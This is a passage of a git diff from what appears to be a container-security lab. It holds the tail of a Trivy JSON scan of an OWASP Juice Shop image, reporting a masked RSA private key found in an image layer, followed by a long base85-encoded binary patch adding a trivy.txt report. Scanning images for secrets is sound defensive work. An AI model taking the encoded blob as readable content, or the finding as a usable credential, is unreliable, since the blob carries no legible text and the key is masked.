"IsCause": false, + "Annotation": "", + "Truncated": false, + "FirstCause": false, + "LastCause": false + } + ] + }, + "Match": "----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed", + "CreatedBy": "COPY --chown=65532:0 /juice-shop . # buildkit" + }, + "Offset": 791 + } + ] + } + ] +} diff --git a/labs/lab4/trivy.txt b/labs/lab4/trivy.txt new file mode 100644 index 0000000000000000000000000000000000000000..254aea54f51c4978586b9f9d58612c82941e7a21 GIT binary patch literal 1039754 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 